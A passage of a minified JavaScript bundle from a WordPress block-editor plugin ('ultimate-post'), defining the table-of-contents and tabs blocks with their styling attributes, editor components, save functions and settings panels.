}"}]},toTopBg:{type:"string",default:"#222",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { background:{{toTopBg}}; }"}]},toTopHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop:hover svg { color:{{toTopHoverColor}}; }"}]},toTopHoverBg:{type:"string",default:"#000",style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}}.wp-block-ultimate-post-table-of-content .ultp-block-wrapper .ultp-toc-backtotop:hover, \n            {{ULTP}}.wp-block-ultimate-post-table-of-content .ultp-block-wrapper .ultp-toc-backtotop:focus { background:{{toTopHoverBg}}; }"}]},toTopSize:{type:"object",default:{lg:"18"},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop svg { width:{{toTopSize}}px; }"}]},toTopBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop"}]},toTopRadius:{type:"object",default:{lg:{top:"4",bottom:"4",left:"4",right:"4",unit:"px"}},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { border-radius:{{toTopRadius}}; }"}]},toTopPadding:{type:"object",default:{lg:{top:"13",bottom:"15",left:"11",right:"11",unit:"px"}},style:[{depends:[{key:"topTop",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-toc-backtotop { padding:{{toTopPadding}}; }"}]},advanceId:{type:"string",default:""},...(0,l(92165).t)(["advanceAttr"],["loadingColor","advanceId"],[{key:"wrapShadow",default:{openShadow:1,width:{top:2,right:5,bottom:15,left:-2,unit:"px"},color:"rgba(0,0,0,0.1)"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},{key:"wrapShadow",default:{openShadow:1,width:{top:2,right:5,bottom:15,left:-2,unit:"px"},color:"rgba(0,0,0,0.1)"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]}])}},54934:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(87462),a=l(67294),i=l(53049),n=l(83245),r=l(64766),s=l(66838);const{Fragment:p}=wp.element,c=[{attributes:{...s.Z},save({attributes:e}){const{blockId:t,advanceId:l,headText:n,collapsible:s,collapsibleType:c,togglePosition:u,topTop:d,toTopIcon:m,layout:g,sticky:y,listData:b,open:v,close:h,initialCollapsible:f}=e;return console.log("1 testing from deprecated"),(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ${1==y?"ultp-toc-sticky":""}`}),(0,a.createElement)("div",{className:"ultp-block-wrapper"},(0,a.createElement)("div",{className:"ultp-block-toc"},(0,a.createElement)("div",{className:"ultp-toc-header"},(0,a.createElement)("div",{className:"ultp-toc-heading"},n),s&&(0,a.createElement)("div",{className:`ultp-collapsible-toggle ${f?"ultp-toggle-collapsed":""} ${"right"==u?"ultp-collapsible-right":""}`},"icon"!==c?(0,a.createElement)(p,null,(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"[",v,"]"),(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-text ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"[",h,"]")):(0,a.createElement)(p,null,(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-open",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_"),(0,a.createElement)("a",{href:"#",className:"ultp-collapsible-icon ultp-collapsible-hide",onClick:e=>{e.preventDefault()}},"_ultp_toc_ic_arrowUp2_ultp_toc_ic_end_")))),(0,a.createElement)("div",{className:`ultp-block-toc-${g} ultp-block-toc-body`,style:{display:f?"none;":"block;"}},(0,i.Ko)(b,g)),d&&(0,a.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},r.ZP[m]))))}},{attributes:{...s.Z},save({attributes:e}){const{blockId:t,advanceId:l,headText:r,collapsible:s,collapsibleType:c,togglePosition:u,topTop:d,toTopIcon:m,layout:g,sticky:y,listData:b,open:v,close:h,initialCollapsible:f}=e;return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t} ${1==y?"ultp-toc-sticky":""}`}),(0,a.createElement)("div",{className:"ultp-block-wrapper"},(0,a.createElement)("div",{className:"ultp-block-toc"},(0,a.createElement)("div",{className:"ultp-toc-header"},(0,a.createElement)("div",{className:"ultp-toc-heading"},r),s&&(0,a.createElement)("div",{className:`ultp-collapsible-toggle ${f?"ultp-toggle-collapsed":""} ${"right"==u?"ultp-collapsible-right":""}`},"icon"!==c?(0,a.createElement)(p,null,(0,a.createElement)("a",{className:"ultp-collapsible-text ultp-collapsible-open",href:"javascript:;"},"[",v,"]"),(0,a.createElement)("a",{className:"ultp-collapsible-text ultp-collapsible-hide",href:"javascript:;"},"[",h,"]")):(0,a.createElement)(p,null,(0,a.createElement)("a",{className:"ultp-collapsible-icon ultp-collapsible-open",href:"javascript:;"},n.ZP.arrowUp2),(0,a.createElement)("a",{className:"ultp-collapsible-icon ultp-collapsible-hide",href:"javascript:;"},n.ZP.arrowUp2)))),(0,a.createElement)("div",{className:`ultp-block-toc-${g} ultp-block-toc-body`,style:{display:f?"none;":"block;"}},(0,i.Ko)(b,g)),d&&(0,a.createElement)("a",{href:"#",className:"ultp-toc-backtotop tocshow"},n.ZP[m]))))}}]},28871:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(99233),n=l(57098),r=l(66838),s=l(92857),p=l(54934);const{__}=wp.i18n,{registerBlockType:c}=wp.blocks,u=(0,a.Z)("https://wpxpo.com/docs/postx/add-on/table-of-content/","block_docs");c(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/table-of-content.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Add a Customizable Table of Contents into your blog posts and custom post types.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:u,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/tableofcontents.svg"}},edit:i.Z,save:n.Z,deprecated:p.Z})},88625:(e,t,l)=>{"use strict";l.d(t,{Z:()=>L});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(87763),s=l(31760),p=l(64766),c=l(58207),u=l(80518);const{__}=wp.i18n,{Dropdown:d}=wp.components,{useEffect:m,Fragment:g,useState:y,useRef:b}=wp.element,{InnerBlocks:v,InspectorControls:h,RichText:f,BlockControls:k,useBlockProps:w}=wp.blockEditor,{getBlockAttributes:x,getBlockRootClientId:T,getBlocksByClientId:_}=wp.data.select("core/block-editor"),{removeBlock:C,insertBlocks:E,moveBlockToPosition:S,updateBlockAttributes:P}=wp.data.dispatch("core/block-editor");function L(e){const[t,l]=y("Content"),{setAttributes:f,name:L,attributes:B,className:U,clientId:M}=e,{blockId:A,currentPostId:H,advanceId:N,previewImg:j,titleTag:Z,navTitle:O,navDescription:R,navIcon:D,chooseIcon:z,activetab:F,layout:W,tabFullWidth:V,tabArrowEnable:G,tabChange:q,initialOpen:$,enableProgressBar:K,tabResponsive:J,stackOnMobile:Y}=B;if(m((()=>{const e=M.substr(0,6),t=x(T(M));(0,a.qi)(f,t,H,M),A?A&&A!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||f({blockId:e})):f({blockId:e})}),[M]),j)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:j});let X;A&&(X=(0,i.Kh)(B,"ultimate-post/tabs",A,(0,a.k0)()));const Q={setAttributes:f,name:L,attributes:B,setSection:l,section:t,clientId:M},ee=b(null),te=b(null),le=b(null),[oe,ae]=y(null),[ie,ne]=y([]),[re,se]=y(!1);let pe=_(M)[0].innerBlocks;const[ce,ue]=y(pe),[de,me]=y({});m((()=>{ue(pe)}),[pe]),m((()=>{P(de?.id,{nav_icon:de?.icon?.length>0?de?.icon:""}),(0,a.Gu)(de?.id),(0,a.Gu)(M)}),[de]),m((()=>{oe&&(S(oe.id,M,M,oe.position),ce.forEach(((e,t)=>{P(e.clientId,{disableChild:!0})})),pe=_(M)[0].innerBlocks,(0,a.Gu)(M),ue(pe))}),[oe]),m((()=>{let e=[];ce?.forEach((t=>{let l={};const{tabIndex:o,tabActive:a,nav_desc:i,nav_text:n,nav_icon:r}=t?.attributes||{};l.tabIndex=o.toLocaleString(),l.active=a,l.nav_desc=i,l.nav_text=n,l.nav_icon=r,e.push(l)})),f({tabMainData:JSON.stringify(e)})}),[ce]);const ge=(e,t)=>{f({activetab:`${e}`}),ce.forEach(((t,l)=>{t.attributes?.tabIndex==e?P(t.clientId,{tabActive:!0}):P(t.clientId,{tabActive:!1})}))},ye=()=>{const e=ie&&ie.length>0?ie.sort((function(e,t){return t-e}))[ie.length-1]:ce.length+1,t={tabActive:!0,nav_text:`Tab ${e}`,tabIndex:e.toLocaleString(),nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style"},l=wp.blocks.createBlock("ultimate-post/tab-item",t);if(E(l,ce.length,M,!1),ie&&ie.length>0){const e=ie.slice(0,-1);ne(e)}},be=(e,t,l)=>{ae({id:e,position:t,activeBlock:l})},ve=b(null),[he,fe]=y(0),ke="left"==W||"right"==W;let we=ke?ve.current?.getBoundingClientRect().height:ve.current?.getBoundingClientRect().width,xe=ke?le.current?.getBoundingClientRect().height:le.current?.getBoundingClientRect().width;const Te=xe/ce.length,_e=xe-we,Ce=he+we;m((()=>{we=ke?ve.current?.getBoundingClientRect().height:ve.current?.getBoundingClientRect().width,xe=ke?le.current?.getBoundingClientRect().height:le.current?.getBoundingClientRect().width,we<xe?(se(!0),ke&&fe(0)):se(!1)}),[xe,W,J]);const Ee=ke?`translate(0px, ${he<0?he:"-"+he}px)`:`translate(-${he}px, 0px)`,Se=w({...N&&{id:N},className:`ultp-block-${A} ${U||""}`,"data-tabevent":q,"data-activetab":$});return(0,o.createElement)(g,null,(0,o.createElement)(k,null,(0,o.createElement)(u.Z,{store:Q,handleAddNewTab:ye})),(0,o.createElement)(h,null,(0,o.createElement)(c.Z,{store:Q})),(0,o.createElement)(s.Z,{include:[{type:"template"}],store:Q}),(0,o.createElement)("div",Se,X&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:X}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{draggable:"false",className:`ultp-tab-wrapper ultp-tab-wrapper-backend ultp-tab-${J} ultp-nav-${W} ultp-tab-${V?"fill-width":"full-width"} ultp-tab-arrow-${-G?"on":"off"} ${Y?" ultp-tab-mobile-stack":""}`},(0,o.createElement)("div",{className:"ultp-tabs-nav-wrapper",draggable:"false"},("slider"==J||ke)&&0!=he&&(0,o.createElement)("span",{className:"ultp-tab-left-arrow ultp-arrow-active",onClick:()=>{_e+he>0&&(_e<Te||he-Te<0?(fe(0),se(!0)):(se(!0),fe(he-Te)))}},p.ZP.leftAngleBold),(0,o.createElement)("div",{draggable:"false",className:"ultp-tabs-nav-inner",ref:ve},(0,o.createElement)("div",{draggable:"false",className:"ultp-tabs-nav",ref:le,style:{transform:Ee},"data-tabnavigation":`.ultp-block-${A}`},ce&&ce?.length>0&&ce.map(((e,t)=>{const{tabIndex:l,nav_text:i,nav_desc:s,tabActive:c,nav_icon:u}=e?.attributes||{},m={titleTag:Z,navDescription:R,navIcon:D,navTitle:O,setAttributes:f,chooseIcon:z,tabIndex:l,nav_text:i,nav_desc:s,id:e.clientId,nav_icon:u,setChildIcon:me,clientId:M,innerBlocks:e.innerBlocks};return(0,o.createElement)("div",{draggable:"false",className:"ultp-tabs-nav-element "+(l==F?"ultp-tab-active tab-progressbar-active":""),onClick:()=>ge(l),onMouseEnter:()=>"mouseenter"==q?ge(l):"",ref:ee,key:l},(0,o.createElement)(I,{navigationAttr:m}),l==F?(0,o.createElement)("div",{className:"ultp-tabs-setting"},(0,o.createElement)("div",{className:"ultp-individual-settings"},(0,o.createElement)("div",{className:"ultp-individual-settings-position"},(0,o.createElement)("div",{onClick:()=>be(e.clientId,t-1,l)}),(0,o.createElement)("div",{onClick:()=>be(e.clientId,t+1,l)})),(0,o.createElement)("div",{className:"ultp-individual-settings-action"},D&&(u.length||z.length)?(0,o.createElement)(d,{position:"bottom right",className:"ultp-listicon-dropdown ultp-tab-icon-dropdown",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{onClick:()=>e(),className:"ultp-tabs-nav-icon"},p.ZP.five_star_line),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:u.length?u:z,label:"Update Single Icon",dynamicClass:" ",onChange:t=>{me({id:e.clientId,icon:t==u?"":t}),(0,a.Gu)(e.clientId),(0,a.Gu)(M)}})}):"",(0,o.createElement)("div",{onClick:()=>((e,t)=>{const l=ie&&ie.length>0?ie.sort((function(e,t){return t-e}))[ie.length-1]:ce.length+1,o={tabIndex:l.toLocaleString(),nav_id:l.toLocaleString(),tabActive:!0,nav_text:`${e.nav_text} Copied`,nav_desc:e.nav_desc},a=wp.blocks.createBlock("ultimate-post/tab-item",o);if(E(a,t+1,M,!0),ie&&ie.length>0){const e=ie.slice(0,-1);ne(e)}})(m,t)},r.Z.duplicate)),(0,o.createElement)("div",{onClick:()=>((e,t)=>{const l=[...ie,t];ne(l),ce.forEach(((t,l)=>{t.clientId==e&&C(t.clientId,!1)}))})(e.clientId,l),className:"ultp-individual-settings-delete"},r.Z.delete))):"",K&&(0,o.createElement)("span",{className:"tab-progressbar"}))}))),(0,o.createElement)("div",{className:"ultp-add-new-tab",onClick:()=>ye()},r.Z.plus)),("slider"==J||ke)&&re&&(0,o.createElement)("span",{className:"ultp-tab-right-arrow ultp-arrow-active",onClick:()=>(we<xe&&xe>Ce&&fe(_e<Te?he+_e:he+Te),void(_e-he<Te&&se(!1))),ref:te},p.ZP.rightAngleBold)),(0,o.createElement)(v,{allowedBlocks:["ultimate-post/tab-item"],template:[["ultimate-post/tab-item",{tabIndex:"1",tabActive:!1,nav_text:"Tab 1",nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style."}],["ultimate-post/tab-item",{tabIndex:"2",tabActive:!0,nav_text:"Tab 2",nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style."}],["ultimate-post/tab-item",{tabIndex:"3",tabActive:!1,nav_text:"Tab 3",nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style."}]],renderAppender:!1})))))}const I=({navigationAttr:e})=>{const{titleTag:t,navDescription:l,navIcon:a,navTitle:i,setAttributes:n,chooseIcon:r,nav_text:s,id:c,nav_desc:u,nav_icon:d,setChildIcon:m,clientId:y}=e;return(0,o.createElement)(g,null,(0,o.createElement)("div",{className:"ultp-tab-title-content",draggable:"false"},a&&(d.length||r.length)?(0,o.createElement)("div",{className:"ultp-tabs-nav-icon"},p.ZP[d.length?d:r]):"",i&&(0,o.createElement)(f,{key:"editable",tagName:t,className:"ultp-tab-title",keeplaceholderonfocus:"true",placeholder:__("Tab Text...","ultimate-post"),onChange:e=>{P(c,{nav_text:e})},value:s})),l&&(0,o.createElement)(f,{key:"editable",tagName:"div",className:"ultp-tab-desc",keeplaceholderonfocus:"true",placeholder:__("Tab Desc...","ultimate-post"),onChange:e=>{P(c,{nav_desc:e})},value:u}))}},23232:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,tabMainArr:r,chooseIcon:s,navIcon:p,activetab:c,tabMainData:u,titleTag:d,navDescription:m,navTitle:g,layout:y,tabFullWidth:b,tabArrowEnable:v,tabChange:h,initialOpen:f,tabResponsive:k,autoPlayDuration:w,enableProgressBar:x,stackOnMobile:T}=e.attributes,_=`${d}`,C=n.save({id:l||void 0,className:`ultp-block-${t}`});return(0,a.createElement)("div",(0,o.Z)({},C,{"data-tabevent":h,"data-activetab":f,"data-responsive":k,"data-duration":w,"data-progressbar":x}),(0,a.createElement)("div",{className:"ultp-block-wrapper"},(0,a.createElement)("div",{className:`ultp-tab-wrapper ultp-tab-${k} ultp-nav-${y} ultp-tab-${b?"fill-width":"full-width"} ultp-tab-arrow-${v?"on":"off"} ${T?" ultp-tab-mobile-stack":""}`},(0,a.createElement)("div",{className:"ultp-tabs-nav-wrapper"},(0,a.createElement)("span",{className:"ultp-tab-left-arrow"},"_ultp_tb_ic_leftAngleBold_ultp_tb_ic_end_"),(0,a.createElement)("div",{className:"ultp-tabs-nav-inner"},(0,a.createElement)("div",{className:"ultp-tabs-nav","data-tabnavigation":`.ultp-block-${t}`},u&&JSON.parse(u)?.length>0&&JSON.parse(u)?.map(((e,t)=>(0,a.createElement)("div",{className:"ultp-tabs-nav-element "+(e.tabIndex==f?"ultp-tab-active tab-progressbar-active":""),"data-tabIndex":e.tabIndex,key:e.tabIndex,"data-order":2*Number(e.tabIndex)-1},(0,a.createElement)("div",{className:"ultp-tab-title-content"},p&&s.length>0?(0,a.createElement)("div",{className:"ultp-tabs-nav-icon","data-animationduration":"400","data-headtext":e.nav_text},"_ultp_tb_ic_"+(e?.nav_icon?.length>0?e.nav_icon:s||"hamicon_3")+"_ultp_tb_ic_end_"):"",g&&(0,a.createElement)(_,{className:"ultp-tab-title",dangerouslySetInnerHTML:{__html:e.nav_text}})),m&&(0,a.createElement)("div",{className:"ultp-tab-desc",dangerouslySetInnerHTML:{__html:e.nav_desc}}),x&&(0,a.createElement)("span",{className:"tab-progressbar"})))))),(0,a.createElement)("span",{className:"ultp-tab-right-arrow"},"_ultp_tb_ic_rightAngleBold_ultp_tb_ic_end_")),(0,a.createElement)("div",{className:"ultp-tab-content"},(0,a.createElement)(i.Content,null)))))}},58207:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>{const{navDescription:t,navIcon:l,navTitle:r,tabMainData:s}=e.attributes,p=s&&JSON.parse(s).sort(((e,t)=>e.tabIndex-t.tabIndex)).map((e=>({value:e.tabIndex,label:__(e.nav_text,"ultimate-post")})));return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid9045",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Layout","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",key:"layout",options:[{img:"assets/img/layouts/tab/tab_nav_top.png",value:"top"},{img:"assets/img/layouts/tab/tab_nav_bottom.png",value:"bottom"},{img:"assets/img/layouts/tab/tab_nav_right.png",value:"right",pro:!0},{img:"assets/img/layouts/tab/tab_nav_left.png",value:"left"}],label:__("Tab Direction","ultimate-post")}},{position:2,data:{type:"toggle",key:"tabFullWidth",label:__("Fill Container Width","ultimate-post")}},{position:3,data:{type:"toggle",key:"stackOnMobile",help:"Navigation Should be vertical on Mobile device",label:__("Stack on Mobile","ultimate-post")}},{position:4,data:{type:"alignment",key:"tabJustifyAlignment",disableJustify:!0,icons:["juststart","justcenter","justend","justbetween"],options:["flex-start","center","flex-end","space-between"],label:__("Justify Navigation","ultimate-post")}},{position:5,data:{type:"select",key:"initialOpen",options:p?.length>0?p:[],help:"Its working on Frontend Only",label:__("Initially Opened Tab","ultimate-post")}},{position:7,data:{type:"toggle",key:"navTitle",label:__("Title","ultimate-post")}},{position:8,data:{type:"toggle",key:"navIcon",label:__("Icon","ultimate-post")}},{position:9,data:{type:"toggle",key:"navDescription",label:__("Description","ultimate-post")}},{position:6,data:{type:"select",key:"tabChange",options:[{value:"click",label:__("On Click","ultimate-post")},{value:"mouseenter",label:__("On Hover","ultimate-post")},{value:"autoplay",pro:!0,label:__("Autoplay","ultimate-post")}],label:__("Tab Change","ultimate-post")}},{position:10,data:{type:"alignment",key:"navContentAlignment",disableJustify:!0,label:__("Items Alignment","ultimate-post")}},{position:11,data:{type:"range",key:"autoPlayDuration",min:0,max:10,step:.5,label:__("Duration","ultimate-post")}},{position:12,data:{type:"toggle",key:"enableProgressBar",label:__("Progress Bar","ultimate-post")}},{position:13,data:{type:"color2",key:"barBgColor",responsive:!0,unit:!0,label:__("Progress Bar Color","ultimate-post")}},{position:14,data:{type:"range",key:"barBgSize",responsive:!0,unit:!1,label:__("Progress Bar Size","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Tab Navigation Style","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"tabArrowEnable",label:__("Tab Arrow/Caret","ultimate-post")}},{position:2,data:{type:"range",key:"navGap",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Gap between Tab Navigation","ultimate-post")}},{position:3,data:{type:"range",key:"navMinWidth",min:1,max:600,step:1,responsive:!0,unit:!0,label:__("Tab Navigation Minimum Width","ultimate-post")}},{position:4,data:{type:"range",key:"navMaxWidth",min:1,max:900,step:1,responsive:!0,unit:!0,label:__("Tab Navigation Minimum Width","ultimate-post")}},{position:4,data:{type:"tab",key:"navTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"navBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navShadow",label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover/Active","ultimate-post"),options:[{type:"color2",key:"navHoverBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navHoverRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navHoverShadow",label:__("Box Shadow","ultimate-post")}]}]}},{position:5,data:{type:"dimension",key:"navPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Title/icon/description Style","ultimate-post"),include:[{position:1,data:{type:"tab",key:"navContentTab",content:[r&&{name:"title",title:__("Title","ultimate-post"),options:[{type:"tag",key:"titleTag",label:__("Title Tag","ultimate-post"),options:[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"},{value:"span",label:"span"},{value:"p",label:"p"}]},{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")},{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"titleHoverColor",label:__("Title Hover/Active Color","ultimate-post")}]},l&&{name:"icon",title:__("Icon","ultimate-post"),options:[{type:"select",key:"iconPosition",options:[{value:"left",label:__("Left of Title","ultimate-post")},{value:"right",label:__("Right of Title","ultimate-post")},{value:"top",label:__("Top of Title","ultimate-post")}],label:__("Icon Position","ultimate-post")},{type:"icon",key:"chooseIcon",label:__("Choose Icon","ultimate-post")},{type:"range",key:"iconSize",responsive:!0,unit:!0,min:1,max:150,step:1,label:__("Icon Size","ultimate-post")},{type:"range",key:"titleIconGap",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Gap with Title","ultimate-post")},{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Icon Hover/Active Color","ultimate-post")}]},t&&{name:"description",title:__("Description","ultimate-post"),options:[{type:"typography",key:"descTypo",label:__("Description Typography","ultimate-post")},{type:"range",key:"descGapTitle",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Gap with Title","ultimate-post")},{type:"color",key:"descColor",label:__("Description Color","ultimate-post")},{type:"color",key:"descHoverColor",label:__("Description Hover Color","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Tab Content/Body","ultimate-post"),include:[{position:1,data:{type:"range",key:"tabBodyGap",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Tab From Tab Menu","ultimate-post")}},{position:2,data:{type:"range",key:"tabBodyMinHeight",min:1,max:900,step:1,responsive:!0,unit:!0,label:__("Tab Content Minimum Height","ultimate-post")}},{position:3,data:{type:"color2",key:"tabBodyBg",label:__("Background Color","ultimate-post")}},{position:4,data:{type:"border",key:"tabBodyBorder",label:__("Border","ultimate-post")}},{position:5,data:{type:"dimension",key:"tabBodyRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")}},{position:6,data:{type:"boxshadow",key:"tabBodyShadow",label:__("Box Shadow","ultimate-post")}},{position:7,data:{type:"dimension",key:"tabBodyMargin",responsive:!0,unit:!0,label:__("Margin","ultimate-post")}},{position:8,data:{type:"dimension",key:"tabBodyPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Navigation Bar Background","ultimate-post"),include:[{position:1,data:{type:"color2",key:"navWrapBg",label:__("Navigation Background","ultimate-post")}},{position:2,data:{type:"border",key:"navWrapBorder",label:__("Border","ultimate-post")}},{position:3,data:{type:"dimension",key:"navWrapRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")}},{position:4,data:{type:"dimension",key:"navWrapPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}},{position:5,data:{type:"dimension",key:"navWrapMargin",responsive:!0,unit:!0,label:__("Margin","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Tab Responsive","ultimate-post"),include:[{position:1,data:{type:"select",key:"tabResponsive",options:[{value:"normal",label:__("Normal","ultimate-post")},{value:"slider",label:__("Slider","ultimate-post")},{value:"accordion",label:__("Accordion","ultimate-post")}],label:__("Responsive Style","ultimate-post")}},{position:2,data:{type:"range",key:"tabSliderArrowSize",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Arrow Icon Size","ultimate-post")}},{position:3,data:{type:"color",key:"tabSliderArrowColor",label:__("Slider Arrow Color","ultimate-post")}},{position:4,data:{type:"color2",key:"tabSliderArrowBg",label:__("Slider Arrow Background","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}},80518:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(59902),n=l(87763),r=l(64766);const{__}=wp.i18n,{Dropdown:s,ToolbarButton:p,ToolbarGroup:c}=wp.components,u=({store:e,handleAddNewTab:t})=>{const[l,u]=(0,i.Z)();return(0,o.createElement)("div",{className:"ultp-tab-toolbar"},(0,o.createElement)(c,null,(0,o.createElement)(p,{className:"ultp-gallery-toolbar-group ultp-menu-toolbar-group"},(0,o.createElement)(a.lj,{store:e,attrKey:"navContentAlignment",options:a.M9,label:__("Alignment","ultimate-post")}))),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Spacing",icon:n.Z.spacing,onClick:()=>e()}),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"range",key:"navGap",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Gap between Tab Navigation","ultimate-post")}},{position:5,data:{type:"range",key:"tabBodyGap",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Tab From Tab Menu","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Style",icon:n.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"navBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navShadow",label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"titleHoverColor",label:__("Title Hover/Active Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Icon Hover/Active Color","ultimate-post")},{type:"color2",key:"navHoverBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navHoverRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navHoverShadow",label:__("Box 